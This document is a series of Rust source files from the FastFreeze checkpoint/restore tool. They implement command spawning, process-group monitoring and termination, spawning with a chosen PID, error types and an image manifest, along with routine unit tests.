pub struct Command { inner: StdCommand, display_args: Vec<String>, show_cmd_on_spawn: bool, stderr_log_prefix: Option<Cow<'static, str>>, } impl Command { pub fn new<I: IntoIterator<Item = S>, S: AsRef<OsStr>>(args: I) -> Self { let mut args = args.into_iter(); let program = args.next().unwrap(); // unwrap() is fine as we never pass empty args let mut cmd = Self { inner: StdCommand::new(&program), display_args: vec![Self::arg_for_display(&program)], show_cmd_on_spawn: true, stderr_log_prefix: None, }; cmd.args(args); cmd } pub fn new_shell<S: AsRef<OsStr>>(script: S) -> Self { // We use bash for pipefail support let mut inner = StdCommand::new("/bin/bash"); inner.arg("-o").arg("pipefail") .arg("-c").arg(&script) .arg("--"); Self { inner, display_args: vec![Self::arg_for_display(&script)], show_cmd_on_spawn: true, stderr_log_prefix: None, } } pub fn arg<S: AsRef<OsStr>>(&mut self, arg: S) -> &mut Self { self.display_args.push(Self::arg_for_display(&arg)); self.inner.arg(&arg); self } pub fn arg_for_display<S: AsRef<OsStr>>(arg: S) -> String { arg.as_ref().to_string_lossy().into_owned() } pub fn args<I: IntoIterator<Item = S>, S: AsRef<OsStr>>(&mut self, args: I) -> &mut Self { for arg in args { self.arg(arg); } self } pub fn set_child_subreaper(&mut self) -> &mut Self { let pre_exec_fn = || { let res = unsafe { libc::prctl(libc::PR_SET_CHILD_SUBREAPER) }; if let Err(e) = nix::errno::Errno::result(res) { error!("Failed to set PR_SET_CHILD_SUBREAPER, proceeding anyways: {}", e); } Ok(()) }; unsafe { self.pre_exec(pre_exec_fn) } } pub fn show_cmd_on_spawn(&mut self, value: bool) -> &mut Self { self.show_cmd_on_spawn = value; self } pub fn spawn(&mut self) -> Result<Process> { let display_cmd = self.display_args.join(" "); let inner = self.inner.spawn() .with_context(|| format!("Failed to spawn `{}`", display_cmd))?; if self.show_cmd_on_spawn { debug!("+ {}", display_cmd); } Ok(Process::new(inner, display_cmd, self.stderr_log_prefix.clone())) } pub fn exec(&mut self) -> 
Result<()> { bail!(self.inner.exec()) } /// `enable_stderr_logging` enables two things: /// 1) stderr is emitted via our logging facilities (info!()). /// log lines are prefixed with `log_prefix`. /// 2) A fixed sized backlog is kept, and included in the error message. /// The process' stderr is drained when calling try_wait(), wait(), or drain_stderr_logger(). pub fn enable_stderr_logging<S>(&mut self, log_prefix: S) -> &mut Command where S: Into<Cow<'static, str>> { self.stderr_log_prefix = Some(log_prefix.into()); // We'd also like to redirect stdout to stderr in some cases. // But I can't find a way to do this in a simple way with the Rust std library. self.stderr(Stdio::piped()); self } } // These are delegates to the inner `StdCommand`. impl Command { pub fn env<K: AsRef<OsStr>, V: AsRef<OsStr>>(&mut self, key: K, val: V) -> &mut Command { self.inner.env(key, val); self } pub fn envs<I: IntoIterator<Item = (K, V)>, K: AsRef<OsStr>, V: AsRef<OsStr>>(&mut self, vars: I) -> &mut Command { self.inner.envs(vars); self } pub fn env_remove<K: AsRef<OsStr>>(&mut self, key: K) -> &mut Command { self.inner.env_remove(key); self } pub fn env_clear(&mut self) -> &mut Command { self.inner.env_clear(); self } pub fn stdin<T: Into<Stdio>>(&mut self, cfg: T) -> &mut Command { self.inner.stdin(cfg); self } pub fn stdout<T: Into<Stdio>>(&mut self, cfg: T) -> &mut Command { self.inner.stdout(cfg); self } pub fn stderr<T: Into<Stdio>>(&mut self, cfg: T) -> &mut Command { self.inner.stderr(cfg); self } #[allow(clippy::missing_safety_doc)] pub unsafe fn pre_exec<F>(&mut self, f: F) -> &mut Command where F: FnMut() -> IoResult<()> + Send + Sync + 'static { self.inner.pre_exec(f); self } } pub trait PipeCommandExt: Sized { /// Create a new pipe input (e.g., stdin). 
fn new_input() -> Result<Self>; /// Create a new pipe output (e.g., stdout, stderr) fn new_output() -> Result<Self>; } impl PipeCommandExt for Pipe { fn new_input() -> Result<Self> { let pipe = Self::new(OFlag::empty())?; fcntl(pipe.write.as_raw_fd(), FcntlArg::F_SETFD(FdFlag::FD_CLOEXEC))?; Ok(pipe) } fn new_output() -> Result<Self> { let pipe = Self::new(OFlag::empty())?; fcntl(pipe.read.as_raw_fd(), FcntlArg::F_SETFD(FdFlag::FD_CLOEXEC))?; Ok(pipe) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/process/process.rs
src/process/process.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Context}; use std::{ borrow::Cow, os::unix::io::RawFd, time::{Duration, Instant}, }; use nix::{ sys::signal::{self, Signal}, unistd::Pid, }; pub use std::process::{ ExitStatus, Stdio, ChildStdin, ChildStdout, ChildStderr, Output as StdOutput, Child }; use crate::signal::{check_for_pending_sigterm, retry_on_interrupt}; use super::{ stderr_logger::{StderrReader, StderrTail}, ProcessError, }; // We create our own `Child` wrapper to provide better error context. // We further expose a slightly different API than what is offered from the stdlib. 
// to incorporate SIGTERM monitoring, and helpful error messages pub struct Process { inner: Child, display_cmd: String, stderr_reader: Option<StderrReader>, stderr_tail: Option<StderrTail>, } impl Process { pub fn new(mut inner: Child, display_cmd: String, stderr_log_prefix: Option<Cow<'static, str>>) -> Self { let stderr_reader = stderr_log_prefix.as_ref().map(|_| StderrReader::new(inner.stderr.take().expect("stderr not captured")) ); let stderr_tail = stderr_log_prefix.map(StderrTail::new); Self { inner, display_cmd, stderr_reader, stderr_tail } } pub fn pid(&self) -> i32 { self.inner.id() as i32 } pub fn kill(&self, signal: Signal) -> Result<()> { signal::kill(Pid::from_raw(self.pid()), signal) .with_context(|| format!("Failed to signal pid={}", self.pid())) } pub fn try_wait(&mut self) -> Result<Option<ExitStatus>> { check_for_pending_sigterm()?; let result = self.inner.try_wait() .with_context(|| format!("wait(pid={}) failed", self.pid())); self.drain_stderr(false)?; result } fn drain_stderr(&mut self, finalize: bool) -> Result<()> { if let Some(stderr_reader) = self.stderr_reader.as_mut() { // expect() is fine. We should always have a tail (see in new()). let tail = self.stderr_tail.as_mut().expect("stderr tail is missing"); if finalize { stderr_reader.set_blocking(true); stderr_reader.drain(tail)?; self.stderr_reader = None; } else { stderr_reader.drain(tail)?; } } Ok(()) } pub fn wait(&mut self) -> Result<ExitStatus> { retry_on_interrupt(|| { check_for_pending_sigterm()?; // We wait for the process to exit, but at the same time we must // drain its stderr. It's a bit painful to do it well with POSIX. // Instead, we'll make a blocking stderr read. // XXX We make the assumption that the process doesn't leak its // stderr to another process. Otherwise, we could be blocking forever, // even though the process has died. 
self.drain_stderr(true)?; // true means read_all the stderr and close self.inner.wait() .with_context(|| format!("wait(pid={}) failed", self.pid())) }) } pub fn wait_timeout(&mut self, until: Instant) -> Result<Option<ExitStatus>> { loop { if let Some(exit_status) = self.try_wait()? { return Ok(Some(exit_status)); } if Instant::now() > until { return Ok(None); } std::thread::sleep(Duration::from_millis(100)); } } pub fn wait_for_success(&mut self) -> Result<()> { let exit_status = self.wait()?; // We do clones, and that seems inefficient, but that simplifies the error // code compared to having an Rc<>. This code path is not performance critical ensure_successful_exit_status( exit_status, self.display_cmd.clone(), self.stderr_tail.clone(), ) } pub fn wait_with_output(self) -> Result<Output> { let Process { display_cmd, inner, stderr_reader, stderr_tail: _ } = self; assert!(stderr_reader.is_none(), "stderr logging is not supported when using wait_with_output()"); // FIXME `wait_with_output()` can read from stderr, and stdout and // ignore if we received a SIGTERM. That's because `read_to_end()` is // used internally, and ignores EINTR. // That means that we won't act on SIGTERM. check_for_pending_sigterm()?; let result = inner.wait_with_output()?; Ok(Output { status: result.status, stdout: result.stdout, stderr: result.stderr, display_cmd, }) } pub fn stderr_logger_fd(&self) -> Option<RawFd> { self.stderr_reader.as_ref().map(|r| r.fd) } pub fn reap_on_drop(self) -> ProcessDropReaper { ProcessDropReaper { inner: self } } // In the following, unwrap() is okay. It would be a logic error to access // these without having setup the corresponding pipe. 
pub fn stdin(&mut self) -> &mut ChildStdin { self.inner.stdin.as_mut().unwrap() } pub fn stdout(&mut self) -> &mut ChildStdout { self.inner.stdout.as_mut().unwrap() } pub fn stderr(&mut self) -> &mut ChildStderr { self.inner.stderr.as_mut().unwrap() } pub fn take_stdin(&mut self) -> Option<ChildStdin> { self.inner.stdin.take() } } pub struct ProcessDropReaper { inner: Process, } impl Drop for ProcessDropReaper { fn drop(&mut self) { // If the process fails, we log the error and move on. let _ = self.inner.wait_for_success() .map_err(|e| error!("{}", e)); } } pub struct Output { pub status: ExitStatus, pub stdout: Vec<u8>, pub stderr: Vec<u8>, pub display_cmd: String, } impl Output { pub fn ensure_success(&self) -> Result<()> { ensure_successful_exit_status(self.status, self.display_cmd.clone(), None) } pub fn ensure_success_with_stderr_log(&self, log_prefix: Cow<'static, str>) -> Result<()> { if self.status.success() { Ok(()) } else { let stderr_tail = String::from_utf8_lossy(&self.stderr) .lines() .map(Into::into) .collect(); bail!(ProcessError { exit_status: self.status, display_cmd: self.display_cmd.clone(), stderr_tail: Some(StderrTail { log_prefix, tail: stderr_tail }), }); } } } fn ensure_successful_exit_status( exit_status: ExitStatus, display_cmd: String, stderr_tail: Option<StderrTail> ) -> Result<()> { if exit_status.success() { Ok(()) } else { bail!(ProcessError { exit_status, display_cmd, stderr_tail }) } } #[cfg(test)] mod test { use super::*; use super::super::*; #[test] fn test_shell() -> Result<()> { let mut cmd = Command::new_shell("exit `echo 33`").spawn()?; let err_msg = cmd.wait_for_success().unwrap_err().to_string(); dbg!(&err_msg); assert!(err_msg.contains("exit `echo 33`")); assert!(err_msg.contains("exit_code=33")); Ok(()) } #[test] fn test_args() -> Result<()> { let out = Command::new(&["echo", "-n", "hello"]) .stdout(Stdio::piped()) .spawn()? .wait_with_output()? .stdout; assert_eq!(String::from_utf8_lossy(&out), "hello"); Ok(()) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/process/spawn_with_pid.rs
src/process/spawn_with_pid.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::Result; use std::{ time::Duration, io::Error as IoError, fs, }; use crate::consts::*; use super::{Command, Process}; // At times, we wish to spawn a process with a desired PID. // We do so when running the application from scratch. /// When the child fails, it can only provide an i32 errno to the parent as /// information with the current pre_exec() from the Rust stdlib. const BAD_PID_ERRNO: i32 = 0x0BAD_71D0; /// `MIN_PID` is the pid Linux gives to a process when it wraps around PID_MAX pub const MIN_PID: i32 = 300; pub trait CommandPidExt { fn spawn_with_pid(self, pid: i32) -> Result<Process>; } impl CommandPidExt for Command { /// Spawns the command with the desired PID. /// Note: we consume self because we mutate it, and it would be unsound to /// call `spawn()` again on it. fn spawn_with_pid(mut self, pid: i32) -> Result<Process> { unsafe { self.pre_exec(move || if std::process::id() as i32 != pid { Err(IoError::from_raw_os_error(BAD_PID_ERRNO)) } else { Ok(()) } ); } set_ns_last_pid(pid-1)?; self.spawn().map_err(|e| { if let Some(e) = e.downcast_ref::<IoError>() { if e.raw_os_error() == Some(BAD_PID_ERRNO) { return anyhow!( "Failed to spawn process with pid={}. \ This happens when other processes are being spawn simultaneously. 
\ The `--on-app-ready` hook can be useful to run programs once safe to do.", pid); } } e }) } } pub fn set_ns_last_pid(pid: i32) -> Result<()> { // The fork hack doesn't work when the requested pid is lower than MIN_PID=300 ensure!(pid >= MIN_PID, "Cannot set pid lower than {}", MIN_PID); Command::new(&["set_ns_last_pid", &pid.to_string()]) .spawn()? .wait_for_success() } pub fn spawn_set_ns_last_pid_server() -> Result<Process> { match fs::remove_file(&*NS_LAST_PID_SOCK_PATH) { Err(e) if e.kind() == std::io::ErrorKind::NotFound => {}, Err(e) => bail!(e), Ok(_) => {}, } let mut process = Command::new(&["set_ns_last_pid"]) .arg(&*NS_LAST_PID_SOCK_PATH) .spawn()?; while !NS_LAST_PID_SOCK_PATH.exists() { if process.try_wait()?.is_some() { process.wait_for_success()?; bail!("set_ns_last_pid exited"); } std::thread::sleep(Duration::from_millis(100)); } Ok(process) }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/process/process_group.rs
src/process/process_group.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Context}; use std::{ os::unix::io::AsRawFd, io::{ErrorKind, Read}, time::{Duration, Instant}, fs, iter, }; use nix::{ poll::{PollFd, PollFlags}, fcntl::OFlag, sys::signal, }; use crate::{ consts::*, util::{poll_nointr, Pipe}, }; use super::{Process, ProcessError, ProcessGroupError}; /// `ProcessGroup` is used for monitoring a group of processes. /// When dropped, the whole group is killed, except non-killable children. pub struct ProcessGroup { /// We use a pipe to process SIGCHLD, because at some point we need to select() /// on a pipe and watch for children to fail simultaneously. sigchld_pipe: fs::File, /// The list of children. It is used in append only mode. Children are never /// removed or reordered. This is important for the integrity of `ProcessHandle`. children: Vec<ProcessMembership>, /// When `ProcessGroup` is dropped, it sends a SIGTERM to the remaining /// killable children. After kill_grace_period has elapsed, it sends a SIGKILL. kill_grace_period: Duration, /// Something to remember for unregistering the sigchld_pipe SIGCHLD. sig_hook_id: Option<signal_hook::SigId>, } pub struct ProcessMembership { inner: Process, /// Once a process has exited, we no longer poll its status. /// We keep the process around because of the get_mut() API. 
exited: bool, /// When the process is marked as killable, it means that the process monitor /// can kill it on drop(). This is useful to make CRIU immune to kills as it /// could leave the application in a bad state. killable: bool, /// When the process is marked as daemon, it means that the process monitor /// won't wait for this process to exit in wait_for_success(). daemon: bool, } /// `ProcessHandle` represents a specific child. It contains the index of the /// child located in the `children` array. The handle is returned by `add()`, and /// used in `get_mut()`. #[derive(Clone, Copy, Debug)] pub struct ProcessHandle(usize); impl From<Process> for ProcessMembership { fn from(inner: Process) -> Self { Self { inner, exited: false, killable: true, daemon: false } } } impl ProcessMembership { pub fn non_killable(self) -> Self { Self { killable: false, ..self } } pub fn daemon(self) -> Self { Self { daemon: true, ..self } } } impl ProcessGroup { pub fn new() -> Result<Self> { Self::with_kill_grace_period(Duration::from_secs(KILL_GRACE_PERIOD_SECS)) } pub fn with_kill_grace_period(kill_grace_period: Duration) -> Result<Self> { let pipe = Pipe::new(OFlag::O_CLOEXEC | OFlag::O_NONBLOCK)?; let sig_hook_id = Some(signal_hook::low_level::pipe::register( signal_hook::consts::SIGCHLD, pipe.write) .context("Failed to register signal")?); Ok(Self { sigchld_pipe: pipe.read, children: Vec::new(), kill_grace_period, sig_hook_id, }) } pub fn add(&mut self, proc: impl Into<ProcessMembership>) -> ProcessHandle { self.children.push(proc.into()); ProcessHandle(self.children.len() - 1) } pub fn get_mut(&mut self, id: ProcessHandle) -> &mut Process { &mut self.children[id.0].inner } fn drain_sigchld_pipe(&mut self) { // Discard the content of the pipe let mut vec = Vec::new(); match self.sigchld_pipe.read_to_end(&mut vec) { Err(e) if e.kind() == ErrorKind::WouldBlock => {} result => { result.expect("SIGCHLD pipe has draining issues"); } } } /// Returns an error if a process has exited 
with a failure. /// Return Ok(true) if some children are remaining, Ok(false) otherwise. pub fn try_wait_for_success(&mut self) -> Result<bool> { self.drain_sigchld_pipe(); // We join the error messages of all errored children. // This is useful when running pipe-connected processes like // "A | B" where both processes are dependent on the other. // When one dies, the other dies too. But we don't know which // one died first. So we report both errors. let mut errors = Vec::new(); for child in &mut self.children { if child.inner.try_wait()?.is_some() { // has child exited ? child.exited = true; if let Err(err) = child.inner.wait_for_success() { // has child errored ? errors.push(err.downcast::<ProcessError>()?); } } } if !errors.is_empty() { bail!(ProcessGroupError { errors }); } Ok(self.children.iter().any(|c| !c.exited && !c.daemon)) } pub fn poll_fds(&self) -> Vec<PollFd> { // Collect all the fd of the stderr that we should be monitoring // with the fd of the sigchld. Drainage of stderrs happens in // child.inner.try_wait() within try_wait_for_success(). self.children.iter() .filter_map(|c| c.inner.stderr_logger_fd()) .chain(iter::once(self.sigchld_pipe.as_raw_fd())) .map(|fd| PollFd::new(fd, PollFlags::POLLIN)) .collect() } pub fn wait_for_success(&mut self) -> Result<()> { while self.try_wait_for_success()? { let timeout = -1; poll_nointr(&mut self.poll_fds(), timeout) .context("Failed to poll()")?; } Ok(()) } pub fn terminate(&mut self) -> Result<()> { // Step 1: SIGTERM all killable children let mut killables = self.children.iter_mut() .filter(|c| c.killable && !c.exited) .collect::<Vec<_>>(); for child in &mut killables { if child.inner.try_wait()?.is_none() { // try_wait() returned none, so the child is not reaped (it is // potentially in a zombie state), and thus kill() should not fail. child.inner.kill(signal::SIGTERM)?; } } // Step 2: SIGKILL all killable children that haven't exited // within the kill_grace_period. 
let deadline = Instant::now() + self.kill_grace_period; for child in &mut killables { if child.inner.wait_timeout(deadline)?.is_none() { // kill() should not fail as the child is still not reaped child.inner.kill(signal::SIGKILL)?; } } // Step 3: wait for all children to exit, including non-killable // children. for child in &mut self.children { child.inner.wait()?; child.exited = true; } // Cleanup the SIGCHLD hook. if let Some(sig_hook_id) = self.sig_hook_id.take() { ensure!(signal_hook::low_level::unregister(sig_hook_id), "signal_hook failed to unregister"); } Ok(()) } } impl Drop for ProcessGroup { fn drop(&mut self) { let _ = self.terminate() .map_err(|e| error!("Skipping children termination: {}", e)); } } pub trait ProcessExt { fn join(self, pgrp: &mut ProcessGroup) -> ProcessHandle; fn join_as_non_killable(self, pgrp: &mut ProcessGroup) -> ProcessHandle; fn join_as_daemon(self, pgrp: &mut ProcessGroup) -> ProcessHandle; } impl ProcessExt for Process { fn join(self, pgrp: &mut ProcessGroup) -> ProcessHandle { pgrp.add(self) } fn join_as_non_killable(self, pgrp: &mut ProcessGroup) -> ProcessHandle { pgrp.add(ProcessMembership::from(self).non_killable()) } fn join_as_daemon(self, pgrp: &mut ProcessGroup) -> ProcessHandle { pgrp.add(ProcessMembership::from(self).daemon()) } } #[cfg(test)] mod test { use super::*; use super::super::*; use nix::sys::signal::Signal; fn new_process_group() -> Result<ProcessGroup> { let kill_grace_period = Duration::from_secs_f32(0.3); ProcessGroup::with_kill_grace_period(kill_grace_period) } #[test] fn test_basic_kill() -> Result<()> { let mut pgrp = new_process_group()?; Command::new(&["sleep", "1000"]) .spawn()? 
.join(&mut pgrp); // drops and kills sleep Ok(()) } #[test] fn test_wait_success() -> Result<()> { let mut pgrp = new_process_group()?; pgrp.add(Command::new(&["true"]).spawn()?); pgrp.add(Command::new(&["sleep"]).arg("0.2").spawn()?); pgrp.wait_for_success() } #[test] fn test_exit_fail() -> Result<()> { let mut pgrp = new_process_group()?; pgrp.add(Command::new(&["true"]).spawn()?); pgrp.add(Command::new(&["sleep"]).arg("1000").spawn()?); pgrp.add(Command::new(&["false"]).spawn()?); let err_msg = pgrp .wait_for_success() .unwrap_err() .to_string(); dbg!(&err_msg); assert!(err_msg.contains("false")); assert!(err_msg.contains("exit_code=1")); Ok(()) } #[test] fn test_exit_fail_multiple() -> Result<()> { let mut cmd1 = Command::new(&["bash", "-c", "exit 2"]).spawn()?; let mut cmd2 = Command::new(&["false"]).spawn()?; let cmd3 = Command::new(&["sleep"]).arg("1000").spawn()?; cmd1.wait()?; cmd2.wait()?; let mut pgrp = new_process_group()?; pgrp.add(cmd1); pgrp.add(cmd2); pgrp.add(cmd3); let err_msg = pgrp .wait_for_success() .unwrap_err() .to_string(); dbg!(&err_msg); assert!(err_msg.contains("bash")); assert!(err_msg.contains("exit_code=2")); assert!(err_msg.contains("false")); assert!(err_msg.contains("exit_code=1")); Ok(()) } #[test] fn test_signaled() -> Result<()> { let cmd = Command::new(&["sleep", "1000"]).spawn()?; cmd.kill(Signal::SIGTERM)?; let mut pgrp = new_process_group()?; pgrp.add(cmd); let err_msg = pgrp .wait_for_success() .unwrap_err() .to_string(); dbg!(&err_msg); assert!(err_msg.contains("sleep")); assert!(err_msg.contains("caught fatal SIGTERM")); Ok(()) } #[test] fn test_unkillable() -> Result<()> { let start_time = Instant::now(); let mut pgrp = new_process_group()?; Command::new(&["sleep", "1"]).spawn()? 
.join_as_non_killable(&mut pgrp); drop(pgrp); println!("elapsed time {}ms", start_time.elapsed().as_millis()); assert!(start_time.elapsed().as_millis() >= 1000); Ok(()) } #[test] fn test_daemon() -> Result<()> { let start_time = Instant::now(); let mut pgrp = new_process_group()?; Command::new(&["sleep", "1000"]).spawn()? .join_as_daemon(&mut pgrp); pgrp.wait_for_success()?; println!("elapsed time {}ms", start_time.elapsed().as_millis()); assert!(start_time.elapsed().as_secs() < 1000); Ok(()) } #[test] fn test_get_mut() -> Result<()> { let mut cmd1 = Command::new(&["bash", "-c", "exit 2"]).spawn()?; let mut cmd2 = Command::new(&["false"]).spawn()?; cmd1.wait()?; cmd2.wait()?; let mut pgrp = new_process_group()?; let ps1 = pgrp.add(cmd1); let ps2 = pgrp.add(cmd2); // processes should still be accessible after terminate() pgrp.terminate()?; assert_eq!(pgrp.get_mut(ps1).wait()?.code().unwrap(), 2); assert_eq!(pgrp.get_mut(ps2).wait()?.code().unwrap(), 1); Ok(()) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/process/error.rs
src/process/error.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use std::{ os::unix::process::ExitStatusExt, convert::TryFrom, process::ExitStatus, fmt, }; use nix::sys::signal::Signal; use serde_json::Value; use crate::util::JsonMerge; use super::stderr_logger::StderrTail; #[derive(Debug)] pub struct ProcessError { pub exit_status: ExitStatus, pub display_cmd: String, pub stderr_tail: Option<StderrTail>, } impl ProcessError { pub fn to_json(&self) -> Value { self.stderr_tail.as_ref().map(|st| json!({ st.log_prefix.as_ref(): { "exit_status": self.formatted_exit_status(), "log": &st.tail, } })).unwrap_or_else(|| json!({})) } pub fn formatted_exit_status(&self) -> String { if let Some(exit_code) = self.exit_status.code() { format!("failed with exit_code={}", exit_code) } else if let Some(signal) = self.exit_status.signal() { let signal = Signal::try_from(signal) .map_or_else(|_| format!("signal {}", signal), |s| s.to_string()); format!("caught fatal {}", signal) } else { format!("Unexpected child exit status {:?}", self.exit_status) } } } impl fmt::Display for ProcessError { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { // We don't display the stderr_tail in the error message because it's // already on screen. The stderr_tail is used when emitting metrics. 
write!(f, "`{}` {}", self.display_cmd, self.formatted_exit_status()) } } impl std::error::Error for ProcessError {} #[derive(Debug)] pub struct ProcessGroupError { pub errors: Vec<ProcessError>, } impl fmt::Display for ProcessGroupError { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { write!(f, "{}", self.errors.iter() .map(|e| e.to_string()) .collect::<Vec<_>>() .join(", ")) } } impl std::error::Error for ProcessGroupError {} impl ProcessGroupError { pub fn to_json(&self) -> Value { self.errors.iter() .map(|e| e.to_json()) .fold(json!({}), |a,b| a.merge(b)) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/process/mod.rs
src/process/mod.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. mod command; mod process_group; #[allow(clippy::module_inception)] mod process; mod spawn_with_pid; mod stderr_logger; mod error; mod monitor; pub use command::{Command, PipeCommandExt, Stdio, EnvVars}; pub use process::{Process, Output}; pub use process_group::{ProcessExt, ProcessGroup}; pub use error::{ProcessError, ProcessGroupError}; pub use spawn_with_pid::{CommandPidExt, set_ns_last_pid, spawn_set_ns_last_pid_server, MIN_PID}; pub use monitor::{monitor_child, ChildDied};
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/process/monitor.rs
src/process/monitor.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::Result; use nix::{ sys::signal::{kill, pthread_sigmask, Signal, SigmaskHow, SigSet}, sys::wait::{wait, WaitStatus}, unistd::Pid }; use crate::cli::ExitCode; #[derive(Debug)] pub enum ChildDied { Exited(u8), Signaled(Signal), } impl std::error::Error for ChildDied {} impl std::fmt::Display for ChildDied { fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { match self { ChildDied::Exited(exit_code) => write!(f, "Application exited with exit_code={}", exit_code), ChildDied::Signaled(signal) => write!(f, "Application caught fatal signal {}", signal), } } } /// `monitor_child()` monitors a child (good for assuming the init role). /// We do the following: /// 1) We proxy signals we receive to our `pid_child` /// 2) We reap processes that get reparented to us, although this should not happen for /// the application process tree, as we set PR_SET_CHILD_SUBREAPER on the application root process. /// 3) When `pid_child` dies, we return an error that contains the appropriate exit_code. /// If the child exited normally, we return Ok(()). /// XXX We don't unregister signals after this function. The caller is expected to exit right after. pub fn monitor_child(pid_child: Pid) -> Result<()> { use libc::c_int; for sig in Signal::iterator() { // We don't forward SIGCHLD, and neither `FORBIDDEN` signals (e.g., // SIGSTOP, SIGFPE, SIGKILL, ...) 
if sig == Signal::SIGCHLD || signal_hook::consts::FORBIDDEN.contains(&(sig as c_int)) { continue; } // Forward signal to our child. // The `register` function is unsafe because one could call malloc(), // and deadlock the program. Here we call kill() which is safe. unsafe { signal_hook::low_level::register(sig as c_int, move || { let _ = kill(pid_child, sig); })?; } } pthread_sigmask(SigmaskHow::SIG_UNBLOCK, Some(&SigSet::all()), None)?; loop { match wait()? { WaitStatus::Exited(pid, 0) if pid == pid_child => { return Ok(()); } WaitStatus::Exited(pid, exit_status) if pid == pid_child => { // When the monitored application dies, the children if any, will get // reparented to us (or whoever is the init process). // That's fine. We are going to exit, and the container will die, killing // all the orphans. return Err(anyhow!(ChildDied::Exited(exit_status as u8)) .context(ExitCode(exit_status as u8))); } WaitStatus::Signaled(pid, signal, _core_dumped) if pid == pid_child => { return Err(anyhow!(ChildDied::Signaled(signal)) .context(ExitCode(128 + signal as u8))); } _ => {}, }; } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/image/manifest.rs
src/image/manifest.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Context}; use serde::{Serialize, Deserialize}; use crate::{ consts::*, store::{Store, FileExt}, }; use super::{Compression, Encryption}; use std::fmt; // The image manifest is what describes how to consume an image. // It holds version, shard location, and compression used. pub enum ManifestFetchResult { Some(ImageManifest), VersionMismatch { fetched: String, desired: String }, NotFound, } #[derive(Serialize, Deserialize)] pub struct ImageManifest { pub version: String, pub num_shards: u32, pub encryption: Option<Encryption>, pub compression: Option<Compression>, pub shard_prefix: String, } impl ImageManifest { /// Make a new image manifest. The shard_prefix is INVOCATION_ID which is picked at random. /// This can make it easier to tie 